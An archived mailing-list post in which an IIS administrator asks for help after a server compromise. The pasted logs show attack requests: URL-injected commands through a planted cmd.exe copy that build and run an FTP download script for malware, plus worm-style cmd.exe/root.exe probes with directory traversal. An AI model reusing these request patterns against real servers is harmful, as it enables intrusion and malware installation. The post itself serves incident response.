Help, I recently found this on my IIS server after being contacted that my webserver attempted to scan someone's machine on port 80. I've looked on my web box and found the following files were installed msxc32.exe which seems to be Mirc program which is some type of chat program. I've talked to other techs here who have not installed this program. I've traced the following ip addresses back to the domain admins but before I contact I need to know if this is the intruder's ip address and what would be the best course of action. On the flip side what do I need to do to prevent this from happening in the future? I have since blocked these addresses but this is only a temp fix. 18:56:21 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr 502 18:56:23 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502 18:56:25 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502 18:56:27 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502 18:56:33 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502 18:56:35 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502 18:56:37 156.63.205.48 GET /iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502 18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502 18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502 20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404 20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404 20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404 20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404 20:20:36 216.158.145.245 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404 20:20:36 216.158.145.245 GET ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Feb 26 2002 - 15:09:01 PST